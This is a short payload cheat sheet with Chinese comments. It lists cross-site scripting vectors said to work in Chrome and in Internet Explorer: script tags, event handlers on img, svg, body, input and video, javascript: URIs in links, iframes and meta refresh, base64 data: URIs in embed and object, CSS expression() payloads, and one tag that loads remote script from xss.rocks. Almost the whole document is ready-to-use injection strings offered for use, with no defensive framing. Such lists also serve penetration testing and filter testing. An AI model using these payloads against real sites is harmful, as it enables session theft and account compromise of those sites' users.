chrome 有效payload:

<script >alert('XSS')</script >
<ScRipT>alert("XSS0")</ScRipT>
<<SCRIPT>alert("XSS1");//<</SCRIPT>
<SCRIPT/XSS SRC=" [https://xss.rocks/xss.js"></SCRIPT](https://xss.rocks/xss.js) >
<ImG src onerror=alert('xxs3')>
<input type="image" src onerror="alert('xss')">
<sVg/onload=alert('XSS')>
<boDY onLOAD=alert('XSS')>
<a href="javascript:alert('xss')">xss link</a>
<a onmouseover="alert('xss')">xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<META HTTP-EQUIV="refresh" CONTENT="0; URL= [https://;URL=javascript:alert('XSS');"](https://%3Burl%3Djavascript:alert('XSS');/) >
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>


//html5
<form id="test"></form><button form="test" formaction="javascript:alert(123)">X</button>
<video src onerror=alert()></video>

//持续弹窗,停不下来
<input onfocus=alert(1) autofocus>

//img标签中一定要携带src属性才能生效,否则浏览器可能不会解析
<img src=# onmouseover="alert('xxs2')">
<ImG src onerror=alert('xxs3')>
<iMg src=# onerror="alert('xxs3')">
<IMG src onerror="alert('xxs4')">
<IMg src="" onerror="alert('xxs5')">

//data source base64
<EMBED SRC="data:image/svg+xml;base64,PHN2Zz48c2NyaXB0PmFsZXJ0KCJYU1MiKTs8L3NjcmlwdD48L3N2Zz4="
type="image/svg+xml"AllowScriptAccess="always"></EMBED>

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="></object>


//常见的事件
onLoad
onError
onClick
onFocus
onMouseOver
onScroll

ie 有效payload

<XSS STYLE="xss:expression(alert('XSS'))">
<style>*{x:expression(alert('xss'))}</style>

json hijacking